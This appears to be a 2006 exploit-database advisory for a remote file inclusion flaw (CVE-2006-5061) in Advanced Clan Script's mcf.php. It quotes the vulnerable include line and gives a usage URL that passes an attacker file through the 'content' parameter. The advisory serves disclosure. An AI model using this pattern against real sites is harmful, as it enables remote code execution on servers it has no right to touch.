Advaced-Clan-Script 3.4 - 'mcf.php' Remote File Inclusion

Author: xdh
type: webapps
platform: php
port: 
date_added: 2006-09-23 
date_updated:  
verified: 1 
codes: OSVDB-29123;CVE-2006-5061 
tags: 
aliases:  
screenshot_url:  
application_url: 

*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*              .___.__
*   ___  ___ __| _/|  |__
*   \  \/  // __ | |  |  \
*    >    </ /_/ | |   Y  \
*   /__/\_ \____ | |___|  /
*         \/    \/      \/  discovered by xdh
*
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    {Critical Level}: Dangerous
*    {Class}: Remote File Inclusion
*    {Venedor site}: http://avc.x.philipwette.de/
*    {Version}: AdVancedClanscript < 3.4
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* VUln:
* Filename: mcf.php
* Line: 70:include("$content");
*
*    usage: http://www.test.com/path/mcf.php?content=xpl
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    greetz ² morgan, nethug-47, r00t, tz4r, x2k,
*         jack, id and many others
*          /server -m irc.root.net.ve -j #morgan
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# milw0rm.com [2006-09-24]